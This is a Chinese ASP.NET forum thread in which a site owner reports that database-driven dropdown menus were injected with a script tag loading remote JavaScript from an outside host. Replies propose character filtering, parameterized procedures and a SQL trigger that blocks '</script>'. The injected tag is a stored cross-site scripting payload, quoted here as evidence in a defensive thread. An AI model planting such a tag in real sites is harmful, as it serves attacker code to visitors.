情况是这样的,就只有1个页面被入侵,该页面有4个DropDownlist 菜单联动,都是从数据库取的数据。
运行一段时间后发现,4个DropDownlist 都被加入了一段相同的代码 <script src=http://3b3.org/c.js></script>
检查数据后后发现,是数据库相应字段的内容都被改了。
我只好隔一段时间就手动update一次。
注:整个网站我都做了防SQL注入。
请求帮助!
运行一段时间后发现,4个DropDownlist 都被加入了一段相同的代码 <script src=http://3b3.org/c.js></script>
检查数据后后发现,是数据库相应字段的内容都被改了。
我只好隔一段时间就手动update一次。
注:整个网站我都做了防SQL注入。
请求帮助!
解决方案 »
- 我想在DetailsView1控件的文本框里输入数值,然后插入到数据库里,可是提示出错。求助
- 有什么方法可以直接修改dll文件的?
- 我的意思是说 ,我在 Application_start 方法中创建了一个新线程来执行一个任务, 那么这个任务的开始和停止,如何控制?(虚拟主机)
- SQLHelper.cs里的一句看不明白,大家解释下,马上结
- 放个.net做的外挂.QQ斗地主,不要问偶要源码,谢谢!
- 怎么得到某段HTML代码啊
- 散分100,vs.net2003无法从vss中获取web项目,不知什么原因
- 重谢!一个动态获取焦点的问题
- 点击button按扭,弹出窗并传参数.来者有分
- 求SQL语句一条,分不够,新开贴再送
- 多个按钮处理单个事件 这个意思是?
- CSDN~~~迷糊····这种异常都没处理?
过滤危险的字符
使用带参数的存储过程,最好不好使用拼接SQL语句的方式查一下原来asp.net版有一个专门sql注入的帖子
我以前就碰到过
比如< script
什么的 用别的符号代替
读出来的时候再转换出来
然后再插入数据
而且我查过数据库,没有script的相关内容
触发器
create trigger tr_table_insertupdate
on tablename
for insert,update
as
if exists (
select 1 from inserted
where data like '%</script>%'
)
begin
RAISERROR ('不能修改或者添加',16,1);
ROLLBACK TRANSACTION
end
go